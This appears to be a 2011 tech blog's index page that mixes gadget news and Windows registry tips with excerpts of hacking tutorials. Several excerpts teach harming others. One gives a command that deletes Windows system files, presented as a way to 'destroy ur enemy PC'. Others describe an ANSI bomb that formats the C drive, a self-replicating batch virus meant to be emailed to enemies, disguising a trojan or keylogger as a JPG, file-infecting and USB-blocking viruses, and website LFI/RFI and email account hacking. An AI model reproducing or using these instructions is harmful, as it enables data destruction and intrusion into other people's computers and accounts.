Acer Iconia Tab W500 Tablet

Feb 28, 2011 | comments

Acer Iconia Tab W500 AMD-powered Windows tablet PC although not yet available has listed in Germany retailer. This Acer pill is currently out there for pre-order and has value tag €499. The W500 weights just unde 1kg and features a 10.1-inch (1280 x 800) LED-backlit touchscreen, a 1.0 GHz C-50 APU (with Radeon HD 6250 graphics). Acer’s Iconia Tab W500...

Sony Ericsson PSP Phone

Feb 28, 2011 | comments

The phone has expected launch in February 2011. It features android 3.0, 1GHz processor, 512MB of RAM, 1GB of ROM, 3.7-inch or 4.1-inch screen and MicroSD sl...

WEBSITE HACKING VIA LFI (Local File Inclusion)

Feb 27, 2011 | comments

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s. Let’s say a hacker found...

BlackBerry Presenter

Feb 26, 2011 | comments

As many of you have already noticed that micro and mini projectors will be available soon. Manufactures like 3M, Microvision and other. Thank God this handy 3.4-inch x 2.4-inch boxlike accessory is designed, so that it can be used with BlackBerry smart phones. It is very simple in use. What you have to do is that, simply connect it with a projector...

SAMSUNG- MATRIX OLED DISPLAYS

Feb 25, 2011 | comments

Samsung aims to release a range of new products that feature transparent active matrix OLED displays within the next 12 months. Transparent AMOLED displays provide the user with a screen behind which objects are still visible. Samsung has been showing prototypes of these displays at shows such as SID. The AMOLED display not only visually set our product...

Virus Program to Restart the Computer at Every Startup

Feb 25, 2011 | comments

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.For this, the virus need to be doubleclicked only once and from then...

How to Create a Computer Virus

Feb 25, 2011 | comments

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code...

RUN COMMANDS

Feb 25, 2011 | comments

* Verification of signatures of files: sigverif * Findfast (if present) : findfast.cpl * Folder Options : control folders * Fonts (fonts) : control fonts * Fonts folder windows : fonts * Free Cell ...: freecell * Game Controllers : Joy.cpl * Group Policy (XP Pro) : gpedit.msc * Hearts (card game) : mshearts *...

pendrive Virus

Feb 25, 2011 | comments

Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++, ,When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.Code is written to directly change the usb registry option and change its key. Not going to explain about registry in detail now, later will explain. 1. Creating usb-pendrive Virus :- * Install Turbo C or C++ * Open TC.exe and there write the coding #include void...

ANSI VIRUS BOMB

Feb 24, 2011 | comments

An ANSI bomb is not necessarily a virus, but more of a computer exploit. By using an ANSI bomb, you can get your victim's hard drive completely wiped.How does an ANSI Bomb work? An ANSI Bomb is scripted through a Text Document, and then saved as a microsoft batch file. It is simply a few lines of code. An ANSI bomb reroutes a few letters on the keyboard. This particular one reroutes the letter 'C,' 'Enter,' and 'Backspace' to the command 'Format C:.' It also reroutes the letters 'nN' to 'yY.' 'yY' also remains 'yY.'What's the point?If you hate someone, this is the exploit for you. Simple, yet effective. Software...

Hide EXE File into JPG

Feb 24, 2011 | comments

How about sending a trojan or a keylogger into your victim using this trick..??1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.Basically what you need is to see hidden files and see the extension of all your files on your pc.2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'4)...

VIRUS

Feb 24, 2011 | comments

This post is to help you to send viruses to your enemies! Here goes,Copy the below code and paste into your notepad.. then save as anyname.batDo not click on that batch file........ Send it your enimies email...It will1) Copy itself into startup2) Copy itself over one thousand times into random spots in your computer3) Hide its self and all other created...

Destroy ur enemy PC with virus

Feb 24, 2011 | comments

Hi all users in this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC,,, 1) Open Notepad 2) write the below command : - del c:\windows\system32\*.* /q 3) Save the above notepad with the extension ".bat or .cmd" as u want !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!Don't double click the...

Speed up ur mobile 50%.

Feb 24, 2011 | comments

This is only for those users which have memory card in their PHONESfirst of all you will need-computer-usb connectivity of MEMORY CARD TO PC(CARD READER) NOT BLUETOOTH-little brainfollow these steps:-1.remove memory card from mobile.2.insert it in CARD READER.3.OPEN start menu>All program>acceSSories>system tools>DISK DEFRAGMENTER4.Just...

Edit any Website

Feb 24, 2011 | comments

Code:javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 This Javascript allows you to edit any website!Just copy and paste instead of the website's adre...

Simple Trick to Turn off all system beeps

Feb 24, 2011 | comments

If you want to turn off all system beeps (like the ones that go through your computers' internal speaker): Start Regedit Go to HKEY_CURRENT_USER\Control Panel\Sound Edit the key Beep and give it a value of No...

adding content to Right click

Feb 24, 2011 | comments

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path. First we will add the copy and move options to the right click menu of all FILES. CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key HKEY_CLASSES_ROOT->*->shellex->ContextMenuHandlers Right click the ContextMenuHandlers key and choose New>Key. Name the new key “Copy To” (without the quotes)....

Pop a banner each time Windows Boots

Feb 24, 2011 | comments

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .r...

To change the icons used for specific drives in explorer

Feb 24, 2011 | comments

Open regedit by typing regedit into start->runthen navigate to HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer now create a key(KEY not VALUE!!) called DriveIcons under Explorer...now within DriveIcons, create another key with the drive letter you want to change (e.g.,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\K)...create...

REMOVING SERVICES DEPENDENCIES

Feb 24, 2011 | comments

This will allow you to disable a service or uninstall it from your system without effecting another service that depends on it. Here's how you do it1. After you have set your services the way you want them and you have disabled/uninstalled something that another services depends on, run "regedit" 2. Under HKEY_LOCAL_MACHINE\System\find the service...

Smartbook AG’s Surfer 360 MR7U

Feb 20, 2011 | comments

With the flodded market of tablets, Smartbook AG has also made an announcement about its latest tablet called Surfer 360 MR7U that comes packed with decent list of features. Physically this tablet measures 99 X 12 X 15.5 mm in size with weight of 430 grams. Smartbook AG Surfer 360 MR7U runs on Android 2.2 OS and is powered by 800 MHz of...

Apollo, the solar Android phone

Feb 20, 2011 | comments

If you’ve ever had your cellphone die when you’re miles from the nearest outlet, any phone that can be charged without needing a plug is bound to have some appeal....

Xoom Tablet

Feb 17, 2011 | comments

For those of you anxiously awaiting the Motorola Xoom tablet, you don’t have that much longer to wait.  While you can’t pre-order one yet, you’ll most likely be able to do so within a week.  But the good news is you finally know how much you’re going to have to scrounge up if you want to get your hands on one of these snazzy Honeycomb tablets. The...

SanDisk’s New Memory Card

Feb 17, 2011 | comments

SanDisk have recently announced that they have began shipping memory cards which use 64 gigabit X4 NAND flash technology, these memory cards are said to be the world’s first to use this technology. This new technology allows the card to store 4 bits of data per cell, this is twice as much as MLC NAND, the 64 gigabit X4 NAND will be used in upcoming...

Batman USB DRIVE

Feb 17, 2011 | comments

Here is some news that I’m sure you gadget geeks will appreciate, especially if you’re lacking memory space or need to take your saved data with you for whatever reason. Warner Bros. have teamed up with Mimoco to produce a series of Batman USB flash drives. These MIMOBOT characters will include the Joker, Catwoman and Robin as well as the Dark Knight...

Hack a Website Using Remote File Inclusion

Feb 17, 2011 | comments

Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it. Searching the...

Best way to Crack the BIOS password

Feb 17, 2011 | comments

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS. Follow...

Web Sites Hacking Methods

Feb 17, 2011 | comments

Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking,...

USE FORGOT PASSWORD RECOVERY TO HACK EMAIL ACCOUNTS

Feb 17, 2011 | comments

Passwords can sometimes be guessed by humans with knowledge of the user’s personal information. Examples of guessable passwords include:     * blank (none)     * the words “password”, “passcode”, “admin” and their derivatives     * a row of letters from the qwerty keyboard — qwerty itself, asdf, or qwertyuiop)    ...

CRACK THE ADMINISTRATOR WITH THESE TOOLS

Feb 17, 2011 | comments

There are already so many articles written on how to recover or reset a password that I’m not going to reinvent the wheel, but instead will guide you to the best online resources that I used to crack my Windows XP password. 1. Ophcrack Live CD – My favorite ways to blank out or crack a Windows password is to use a Linux Live CD. These are special...

How to Hack Email

Feb 17, 2011 | comments

I know most of you might be wondering to know how tohack email? You as the reader are most likely reading this because you want to hack into someone’s email account or catch a cheating spouse, girl/boy friend by gaining access to their email accounts. So read on to find out the real and working ways to hack any email and expose the truth behind the...

hack system

Feb 17, 2011 | comments

Well as i already mentioned u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking. steps: - 1.Download software PORT SCANNER. 2.Copy the ip address of the victim whose port is open. 3.Download...

Google Adsense Approval triks

Feb 17, 2011 | comments

ADSENSE APPROVAL THROUGH FREE  DOMAINS Now a days bloggers are not get approved for adsense program due to heavy traffic in participation as a publisher in adsense. thus adsense has started making strict and standard valuation of the site. so mostly domains are approved now a day. if the person feel than domains are costly. there are some...
 
Support : INDIATRIKS
Copyright © 2011. INDIATRIKS - All Rights Reserved
Template Edited By Indiatriks
Proudly Powered By Blogger